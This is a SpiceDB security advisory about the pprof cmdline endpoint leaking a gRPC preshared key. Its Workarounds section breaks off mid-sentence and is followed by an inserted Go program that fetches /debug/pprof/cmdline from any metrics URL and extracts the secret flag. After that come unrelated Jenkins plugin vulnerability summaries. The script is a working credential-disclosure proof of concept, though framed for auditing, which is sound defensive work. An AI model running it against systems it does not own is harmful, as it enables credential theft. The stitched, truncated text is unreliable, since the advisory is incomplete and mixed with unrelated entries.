SpiceDB is an open source, Google Zanzibar-inspired database system for creating and managing security-critical application permissions.

# Impact

The `spicedb serve` command accepts a flag named `--grpc-preshared-key`, which protects the gRPC API from being accessed by unauthorized requests. The value of this flag is sensitive, secret data.

The `/debug/pprof/cmdline` endpoint served by the metrics service (running by default on port `9090`) reveals the command-line flags passed to the process, for debugging purposes. If the preshared key is set via `--grpc-preshared-key`, the key is revealed by this endpoint along with every other flag provided to the SpiceDB binary.

Users **MAY be affected** if they expose their metrics port to an untrusted network and configure `--grpc-preshared-key` via the command-line flag.

Users configuring SpiceDB via environment variables are **NOT affected**.

All deployments abiding by the recommended best practices for production usage are **NOT affected**:

- Authzed's SpiceDB Serverless
- Authzed's SpiceDB Dedicated
- SpiceDB Operator

# Patches

This issue has been fixed in version 1.19.1.

# Workarounds

To work around this issue you can do one of the following:

- Configure the preshared key via an environment variable (e.g.
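The leak above is a property of Go's `net/http/pprof` package: its `cmdline` handler writes `os.Args` joined by NUL bytes, so any secret passed as a flag is served to whoever can reach the debug mux. The following is an added example, not SpiceDB or Authzed code: it stands up an in-process debug server with a constructed command line, fetches `/debug/pprof/cmdline` the way an attacker on the metrics network would, and reports any `--grpc-preshared-key` value it finds. The key value and the `--metrics-addr` argument are constructed for illustration; `CheckMetricsEndpoint` can be pointed at a real `http://host:9090` to audit a deployment before and after the upgrade or workaround.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	_ "net/http/pprof" // registers /debug/pprof/* on http.DefaultServeMux, as a Go debug/metrics server typically does
	"os"
	"strings"
)

// SensitiveFlags are command-line flags whose values are secrets. Only
// --grpc-preshared-key is named by the advisory; extend the list as needed.
var SensitiveFlags = []string{"--grpc-preshared-key"}

// ParseCmdline splits a /debug/pprof/cmdline response body back into
// arguments. net/http/pprof writes os.Args joined by NUL bytes.
func ParseCmdline(body []byte) []string {
	s := strings.TrimRight(string(body), "\x00")
	if s == "" {
		return nil
	}
	return strings.Split(s, "\x00")
}

// LeakedSecrets returns flag -> value for every sensitive flag present in
// args, accepting both "--flag value" and "--flag=value" spellings.
func LeakedSecrets(args []string) map[string]string {
	found := map[string]string{}
	for i, a := range args {
		for _, f := range SensitiveFlags {
			switch {
			case a == f && i+1 < len(args):
				found[f] = args[i+1]
			case strings.HasPrefix(a, f+"="):
				found[f] = strings.TrimPrefix(a, f+"=")
			}
		}
	}
	return found
}

// CheckMetricsEndpoint fetches /debug/pprof/cmdline from a metrics base URL
// such as http://localhost:9090 and reports any leaked secret flags. A
// connection error (port firewalled) or a non-200 status means the endpoint
// did not hand out the command line.
func CheckMetricsEndpoint(base string) (map[string]string, error) {
	resp, err := http.Get(base + "/debug/pprof/cmdline")
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		return nil, fmt.Errorf("cmdline endpoint returned %d", resp.StatusCode)
	}
	body, err := io.ReadAll(io.LimitReader(resp.Body, 1<<20))
	if err != nil {
		return nil, err
	}
	return LeakedSecrets(ParseCmdline(body)), nil
}

// DemoLeak simulates the vulnerable configuration in-process: the preshared
// key is passed as a flag, and the pprof handlers are exposed on the same
// mux the metrics server uses. The returned map is what an attacker learns.
func DemoLeak() (map[string]string, error) {
	saved := os.Args
	defer func() { os.Args = saved }()
	// Constructed command line (assumption, not a real deployment). The
	// "--metrics-addr" argument only illustrates that unrelated flags leak too.
	os.Args = []string{"spicedb", "serve", "--grpc-preshared-key", "example-secret", "--metrics-addr", ":9090"}

	srv := httptest.NewServer(http.DefaultServeMux)
	defer srv.Close()
	return CheckMetricsEndpoint(srv.URL)
}

func main() {
	leaks, err := DemoLeak()
	if err != nil {
		fmt.Println("check failed:", err)
		return
	}
	for flag, val := range leaks {
		fmt.Printf("LEAK: %s=%q exposed via /debug/pprof/cmdline\n", flag, val)
	}
}
```

Moving the key into an environment variable defeats this scanner because `os.Args` no longer contains it; the endpoint still discloses the remaining flags, which is why firewalling the metrics port from untrusted networks is the other half of the workaround.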
Jenkins Report Portal Plugin 0.5 and earlier stores ReportPortal access tokens unencrypted in job `config.xml` files on the Jenkins controller as part of its configuration, where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.

A missing permission check in Jenkins Fogbugz Plugin 2.2.17 and earlier allows attackers with Item/Read permission to trigger builds of jobs specified in a `jobname` request parameter.

A missing permission check in Jenkins Assembla merge request builder Plugin 1.1.13 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified repository.

A missing permission check in Jenkins Quay.io trigger Plugin 0.1 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified repository.

A missing permission check in Jenkins Thycotic Secret Server Plugin 1.0.2 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.

A missing permission check in Jenkins TurboScript Plugin 1.3 and earlier allows attackers with Item/Read permission to trigger builds of jobs corresponding to the attacker-specified repository.

A missing permission check in Jenkins Report Portal Plugin 0.5 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified bearer token authentication.